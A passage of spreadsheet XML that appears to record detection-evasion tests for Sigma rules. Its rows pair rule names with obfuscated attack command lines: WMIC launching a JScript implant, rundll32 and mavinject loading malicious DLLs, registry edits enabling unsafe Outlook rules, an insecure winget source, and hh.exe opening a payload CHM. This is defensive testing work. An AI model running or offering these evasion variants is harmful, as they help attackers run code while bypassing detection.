      <c r="H176" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I176" s="43" t="n"/>
      <c r="J176" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K176" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="43" t="n"/>
      <c r="B177" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C177" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D177" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E177" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nOloGo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I177" s="43" t="n"/>
      <c r="J177" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K177" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="43" t="n"/>
      <c r="B178" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C178" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D178" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E178" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I178" s="43" t="n"/>
      <c r="J178" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K178" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="43" t="n"/>
      <c r="B179" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C179" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D179" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E179" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F179" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G179" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H179" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I179" s="43" t="n"/>
      <c r="J179" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K179" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="43" t="n"/>
      <c r="B180" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C180" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D180" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E180" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F180" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G180" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H180" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I180" s="43" t="n"/>
      <c r="J180" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K180" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="36" t="n"/>
      <c r="B181" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C181" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D181" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E181" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /u"</t>
        </is>
      </c>
      <c r="F181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I181" s="43" t="n"/>
      <c r="J181" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K181" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="36" t="n"/>
      <c r="B182" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C182" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D182" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E182" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /n -"u""</t>
        </is>
      </c>
      <c r="F182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I182" s="36" t="n"/>
      <c r="J182" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K182" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="36" t="n"/>
      <c r="B183" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C183" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D183" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E183" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /S /N /u"</t>
        </is>
      </c>
      <c r="F183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I183" s="43" t="n"/>
      <c r="J183" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K183" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="36" t="n"/>
      <c r="B184" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C184" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D184" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E184" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /"n" /u"</t>
        </is>
      </c>
      <c r="F184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I184" s="43" t="n"/>
      <c r="J184" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K184" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="36" t="n"/>
      <c r="B185" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C185" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D185" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E185" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /N /u"</t>
        </is>
      </c>
      <c r="F185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I185" s="43" t="n"/>
      <c r="J185" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K185" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="36" t="n"/>
      <c r="B186" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C186" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D186" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E186" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /N /U"</t>
        </is>
      </c>
      <c r="F186" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G186" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H186" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I186" s="36" t="n"/>
      <c r="J186" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K186" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="36" t="n"/>
      <c r="B187" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C187" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D187" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E187" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" -"n" /U"</t>
        </is>
      </c>
      <c r="F187" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G187" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H187" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I187" s="36" t="n"/>
      <c r="J187" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K187" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="36" t="n"/>
      <c r="B188" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C188" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D188" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E188" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" /N /u"</t>
        </is>
      </c>
      <c r="F188" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G188" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H188" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I188" s="36" t="n"/>
      <c r="J188" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K188" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="36" t="n"/>
      <c r="B189" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C189" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D189" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E189" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /"u""</t>
        </is>
      </c>
      <c r="F189" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G189" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H189" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I189" s="43" t="n"/>
      <c r="J189" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K189" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="36" t="n"/>
      <c r="B190" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C190" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D190" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E190" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n -"u""</t>
        </is>
      </c>
      <c r="F190" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G190" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H190" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I190" s="36" t="n"/>
      <c r="J190" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K190" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="36" t="n"/>
      <c r="B191" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C191" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D191" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E191" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /"n" /"u""</t>
        </is>
      </c>
      <c r="F191" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G191" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H191" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I191" s="36" t="n"/>
      <c r="J191" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K191" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="43" t="n"/>
      <c r="B192" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C192" s="36" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D192" s="36" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E192" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\svchost.exe"</t>
        </is>
      </c>
      <c r="F192" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G192" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H192" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I192" s="43" t="n"/>
      <c r="J192" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K192" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="43" t="n"/>
      <c r="B193" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C193" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D193" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E193" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\mavinject.exe 1234 /"INJECTRUNNING" C:\path\to\malicious.dll</t>
        </is>
      </c>
      <c r="F193" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G193" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H193" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I193" s="43" t="n"/>
      <c r="J193" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K193" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="43" t="n"/>
      <c r="B194" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C194" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D194" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E194" s="36" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INJECTRUNNING\tC:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F194" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G194" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H194" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I194" s="36" t="n"/>
      <c r="J194" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K194" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="43" t="n"/>
      <c r="B195" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C195" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D195" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E195" s="36" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INjectRUNNInG\Tc:\TemP\Evil.DlL</t>
        </is>
      </c>
      <c r="F195" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G195" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H195" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I195" s="43" t="n"/>
      <c r="J195" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K195" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="43" t="n"/>
      <c r="B196" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C196" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D196" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E196" s="36" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /iNJECTRUnniNg\tC:\TEmp\evIl.dll</t>
        </is>
      </c>
      <c r="F196" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G196" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H196" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I196" s="43" t="n"/>
      <c r="J196" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K196" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="43" t="n"/>
      <c r="B197" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C197" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D197" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E197" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg add HKCU\Software\Microsoft\Office\16.0\Outlook\Security /v EnableUn^safeClientMailRules /t REG_DWORD /d 1 /f"</t>
        </is>
      </c>
      <c r="F197" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G197" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H197" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I197" s="43" t="n"/>
      <c r="J197" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K197" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="43" t="n"/>
      <c r="B198" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C198" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D198" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E198" s="36" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v EnableUnsafeClientMailRules /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F198" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G198" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H198" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I198" s="43" t="n"/>
      <c r="J198" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K198" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="43" t="n"/>
      <c r="B199" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C199" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D199" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E199" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F199" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G199" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H199" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I199" s="36" t="n"/>
      <c r="J199" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K199" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1" s="42">
      <c r="A200" s="43" t="n"/>
      <c r="B200" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_pingcastle</t>
        </is>
      </c>
      <c r="C200" s="36" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution</t>
        </is>
      </c>
      <c r="D200" s="36" t="inlineStr">
        <is>
          <t>2433a154-bb3d-42e4-86c3-a26bdac91c45</t>
        </is>
      </c>
      <c r="E200" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "audit_tool.exe --s^canner a^clcheck"</t>
        </is>
      </c>
      <c r="F200" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G200" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H200" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I200" s="43" t="n"/>
      <c r="J200" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K200" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="201" ht="15.75" customHeight="1" s="42">
      <c r="A201" s="43" t="n"/>
      <c r="B201" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C201" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D201" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E201" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-N' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F201" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G201" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H201" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I201" s="36" t="n"/>
      <c r="J201" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K201" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="202" ht="15.75" customHeight="1" s="42">
      <c r="A202" s="43" t="n"/>
      <c r="B202" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C202" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D202" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E202" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F202" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G202" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H202" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I202" s="36" t="n"/>
      <c r="J202" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K202" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="203" ht="15.75" customHeight="1" s="42">
      <c r="A203" s="43" t="n"/>
      <c r="B203" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C203" s="36" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D203" s="36" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E203" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F203" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G203" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H203" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I203" s="36" t="n"/>
      <c r="J203" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K203" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="204" ht="15.75" customHeight="1" s="42">
      <c r="A204" s="43" t="n"/>
      <c r="B204" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C204" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D204" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E204" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F204" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G204" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H204" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I204" s="36" t="n"/>
      <c r="J204" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K204" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="205" ht="15.75" customHeight="1" s="42">
      <c r="A205" s="43" t="n"/>
      <c r="B205" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C205" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D205" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E205" s="36" t="inlineStr">
        <is>
